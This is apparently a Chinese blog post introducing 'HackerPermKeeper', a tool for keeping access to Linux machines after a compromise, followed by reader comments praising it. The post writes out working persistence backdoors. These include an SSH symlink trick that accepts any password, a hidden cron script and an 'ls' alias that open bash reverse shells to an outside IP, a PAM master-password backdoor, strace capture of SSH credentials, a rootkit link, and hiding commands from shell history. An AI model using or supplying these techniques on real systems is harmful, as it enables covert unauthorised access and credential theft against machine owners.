通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]
查看下面的表格可以知道生成的权限维持文件可以运行的python版本,但是这个项目本身是python3运行的[我自己的环境是Python 3.9.7]

快速使用

pip install -r requirements.txt

快速判断目标机器适合的权限维持模块
运行 /check/ 目录下的check.py文件
[这个不需要任何依赖环境,python3和python2都支持]
python check.pypython3 check.pypython2 check.py

查看权限维持模块信息python main.py -c 1

查看权限维持模详细块信息python main.py -c 2

使用此项目生成权限维持脚本[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本] python main.py -m 1 #选择模块

有的生成的脚本文件。 需要在生成之后进行手动修改 比如:修改反弹shellip以及端口,后门用户密码,ssh密钥密码,ssh密钥等 [此缺陷将会在第二个版本修复]生成的文件会在payloads目录下产生

OpenSSH后门万能密码&记录密码(这个需要依赖环境),
就是把对方的门换个锁,但是原来的钥匙也可以使用
PAM后门,PAM是一个linux登录验证的认证服务,修改其中关于ssh登录的验证
添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼)
SSH软链接
cat /etc/ssh/sshd_config|grep UsePAMln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888 ssh root@xx.xx.xx.xx -p 8888
任意密码登录即可 crontab后计划任务
1、编辑后门反弹
vim /etc/.111.sh #!/bin/bashsh -i >& /dev/tcp/192.168.86.137/3434 0>&1 chmod +x /etc/.111.sh
2、添加定时任务vim /etc/crontab*/1 * * * * root /etc/.1111.sh Strace后门strace是一个动态跟踪工具,
它可以跟踪系统调用的执行。
我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围
可以记录ssh明文和密钥(登录的)和Rootkit配合一起 命令自定义-Alias后门alias命令的功能:
为命令设置别名
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'
执行ls就会反弹shell持久化+隐藏:重启依旧生效 Rootkit后门
https://github.com/f0rb1dd3n/Reptile/releases/
Rootkit是一种特殊的恶意软件,
它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,
比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。
但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大)
history不记录执行命令在输入命令时候,添加空格
ssh软链接&crontab快速生成软链接[需要运行脚本成功后,一分钟连接]
并且执行计划任务,每分钟判断当前软链接是否存在,
如果被kill掉,就重新执行 越多,越容易发发现
越少,越难发现,但是部署起来,需要的依赖很多
工具下载:
下载地址1:

新喀里多尼亚 1F
这个工具对红队来说挺实用的,省了不少手工测试的时间。
英国 2F
检查脚本支持Python2和3这点考虑得挺周全。
北京市 B1
@ 飘扬彩带 兼容性考虑得是挺细的,毕竟目标环境千奇百怪。
吉林省 3F
手动改反弹shell的配置会不会有点麻烦?
日本 4F
之前做渗透测试时也用过类似方法,但没这么全。
北京市 B1
@ 陨铁骑士 嗯,整合得确实挺全的,省得自己到处找脚本了。
澳大利亚 5F
表格看着有点乱,能整理得更清晰点不?
湖南省郴州市 6F
OpenSSH后门那个万能密码的方案具体咋实现的?
浙江省温州市 7F
Rootkit部分难度确实大,小白估计搞不定。
辽宁省本溪市 8F
下载链接里的图片是工具界面截图吗?
陕西省西安市 9F
工具依赖多的话,实战部署会不会容易出问题?
印度 10F
记录history不执行命令那个技巧之前用过,挺隐蔽的。
湖北省武汉市 11F
这工具实战能用上吗?好奇具体效果咋样。
日本 12F
OpenSSH后门万能密码那个方案,是不是得root权限才能改配置啊?
广东省韶关市 13F
试了下crontab那个,反弹shell确实好使,就是得自己改IP端口。
北京市 14F
工具依赖多部署起来麻烦,不如手工一个个验证来得稳。
湖北省武汉市 15F
小白表示看着头大,有没有更傻瓜式的教程啊?
韩国 16F
之前搞渗透也用过ssh软链接,不过没加计划任务,容易掉。
上海市 B1
@ 铁画魂 确实,加个计划任务做守护稳多了,不然一重启就没了。
陕西省西安市 17F
表格信息量太大了,一眼看过去有点懵。
湖北省恩施州 18F
Rootkit手动改代码太难了,有没有现成的模块直接用?
四川省攀枝花市 19F
工具生成的脚本还要手动改,这点有点坑,等修复吧。
越南 20F
下载链接里的图片是使用示例吗?看着像对比表格。
上海市长宁区 21F
这个工具对于红队来说确实省了不少时间,之前手工验证各种维持方法太麻烦了。
湖南省娄底市 22F
OpenSSH后门那个万能密码方案具体是修改哪个配置文件啊?
辽宁省营口市 23F
手动改脚本配置是有点烦,不过至少比从头写强。
台湾省嘉义市 24F
表格信息确实有点杂,要是能按技术分类展示就好了。
澳大利亚 25F
Rootkit部分对新手不太友好,有没有更简单的替代方案?
浙江省 26F
历史记录不执行命令的技巧实战中挺有用的,不容易被发现。
北京市怀柔区 27F
工具依赖多的话,在目标机器上部署会不会被安全软件发现?
澳大利亚 28F
感觉这个工具主要是整合了常见手法,方便统一管理。
北京市 29F
SSH软链接那招有点东西,隐蔽性还行。
江苏省苏州市 30F
等第二个版本修复自动配置功能,现在手动改容易出错。
湖南省郴州市 31F
之前用crontab反弹shell,IP经常变,每次都要改脚本。
福建省厦门市 32F
ssh软链接加计划任务这个组合思路不错,学习了。
山东省 33F
Rootkit那段有点劝退,手写难度太高了。